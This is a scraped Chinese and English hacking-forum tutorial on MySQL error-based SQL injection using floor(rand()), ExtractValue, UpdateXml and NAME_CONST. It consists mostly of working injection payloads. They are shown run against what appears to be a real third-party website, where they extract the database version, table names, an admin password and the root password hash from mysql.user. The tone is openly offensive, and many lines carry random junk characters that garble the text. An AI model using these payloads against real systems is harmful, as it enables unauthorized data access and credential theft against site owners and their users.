mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

admin

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下：
首先进行正常查询：

mysql> select * from article where id = 1;
+—-+——-+———+
| id | title | content |
- ?( a9 F  L" }; Y0 k( v+—-+——-+———+
! x% K. D2 \2 a3 l|  1 | test  | do it   |
+—-+——-+———+

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。
$ }- Q/ Y( j$ x. {例如我们需要查询管理员用户名和密码：

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
& h" {7 C4 r* M! nERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
! n1 p5 h( g& c+ }测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

  i. k6 T' J* V' E5 h2 P
" F; V. a/ u& z$ [; D( V# @

再收集：

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
1 s) S; c! l7 o' C: J
, b. B* X0 X# L1 oErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
3 [+ q/ [+ t' s6 d; `% [
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
1 d- L* S$ a" C
( j$ P/ W: }$ b/ K$ v: cMYSQL高版本报错注入技巧-利用NAME_CONST注入
2 P, ~! ^6 Y/ ?! L% b& V. |8 mIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
" ?  \) x+ A/ W4 q" D- i# a+ E

相关信息
8 L2 j% m( X: o; s, M9 G
* m! d. l& O* [7 aNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
5 q- i/ s; M% C9 I7 s+ u  cNAME_CONST(DATA, VALUE)

+ i6 Q# C! K! a) H6 \Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

  ]' o: e7 r, O7 e# L2 ^8 k. ySELECT NAME_CONST('TEST', 1)


" h) E# A! t& r. ?
|---------------|
' V9 z9 n# M* V3 M( t1 Z! e  J|     TEST      |
) Y: |! L7 C8 \" o4 ~* V( M: X: K" b1 g|               |
|---------------|
5 d, s9 u0 a+ c& ^|       1       |
|               |
' \+ D' b" t" O' d|---------------|

8 g/ |( F. o! o2 M' d9 n5 C


% Q$ s1 ~% v2 h, J4 g* Xhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
! b+ s( k1 T3 JIntro to MySQL Variables
: t; I  K, o+ c7 U0 ?
3 {( ~" J: O* h: ~: S3 A. G3 W3 E3 }* lOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
4 m- i* J0 A5 {
, k/ I3 e5 z' }Code:
7 l5 Z8 s, m$ o& ~( bhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
; P! k' q' Q% ]9 A" e* i


4 `  ~4 [8 o' S7 e( u4 k( h

' L3 w4 \  u: ^/ `& ]6 ZCode:
+ O8 t3 x0 U! e- i* p% H+ s' R/ ~6 Dand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
! K& s; p5 z4 m$ s4 L  k. ~9 D# p! V
4 K: b- U* b3 E) q, o
VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

3 L( z3 a4 p6 d. z+ K& tLet's try it out on my site..

% }, ^! ^) L2 h9 U( q: nCode:
9 B. g" x% P  Y& N) n: G' @http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

; ]* ?/ F+ \* z! IErroruplicate column name '5.0.27-community-nt'

+ A6 ?; U* @6 x
! ^7 g  v; r$ r; }3 S5 ^6 g. E
. g. l7 n0 M& i) V

+ R7 U! I- ^# }" O6 p+ ^; f& C3 rNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

3 L% Y  K% i: F% c( v( iCode:
4 K3 |2 y* Y) q5 T/ n0 Q. p+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
; |* Q) q' ?# t5 u' j. P" u" S

: V6 u  G9 ^% jWe should get a duplicate column 1 error...

# a" X+ q7 |8 _1 n% O+ W4 K; LCode:
. U( D+ n  D% p% ~" Uhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

" p5 T1 H1 ?% q: MErroruplicate column name '1
2 M7 X: Y/ u5 ~6 i' [9 t1 [

4 R: q1 N- ~. t& I$ Q
+ p  \) R, G. k- P' L# ]5 F
3 R8 E. p% g! l9 f5 |
. n0 J% E; [3 ?$ F9 k
Now let's get the tables out this bitch..

Code:
% d' X2 V, b; u' o3 P+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

8 n4 S0 v9 O  [- R  m3 x& P
Let's see if it works here, if it does, we can go on and finish the job.

5 a( F: J/ L+ A$ r# S* d0 i, l+ L4 xCode:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

7 \5 O7 i; y; E/ ]6 x" ^/ v
Erroruplicate column name 'com_admanage
: A7 B! `0 M, B3 x2 m
" n! [( \9 y9 g, T0 N$ Z6 s) L% J6 S

! e0 |. p8 Y& E6 {' i0 N


Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

' W$ D) f! O, e9 _: L  ZLet's get the columns out of the user table..

$ H" i3 E: S, `  z/ W& V1 N" ]Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--


/ V! q6 v- k. E$ @( ASo mine looks like this, and I get the duplicate column name 'Host'.

, R& Z, x# W3 \& a# FCode:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
; X; S3 |! k4 I- ]' e" N4 I
8 u$ `7 v  N2 M, u* T, cErroruplicate column name 'Host'
5 K- F! T1 `  v  M' A5 Z

1 M9 h9 R* _- `. k

, Q) O% R+ J6 `4 d

0 c9 U! i1 I* W0 \0 DWoot, time to finish this bitch off.
5 O' Q# ]1 i+ t8 L, H  O! ~$ C
5 ^- d; W# T( c. m9 f! p2 `Code:
+ L5 k" Q$ u2 r" E5 h0 Y+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

+ q* M0 b/ H/ [/ O6 Y
" P1 C  n! f6 c# m# ]So mine looks like this...
- e7 z0 |! C. X" p
Code:
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
& p# {9 W7 e6 H  i1 u3 l$ H: \5 |
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'


6 q' q$ y8 Y& j

* ^0 R/ l& ^. F9 h, Y8 y$ i. E4 j
9 n$ Y1 u$ c) _" e: z5 [- R
: d& m& N% W3 L7 j- M- AAnd there we have it, thanks for reading.
0 a- {9 M% r3 d( M6 g  T
- q4 k" @# v6 y4 J. ]3 B, i' ~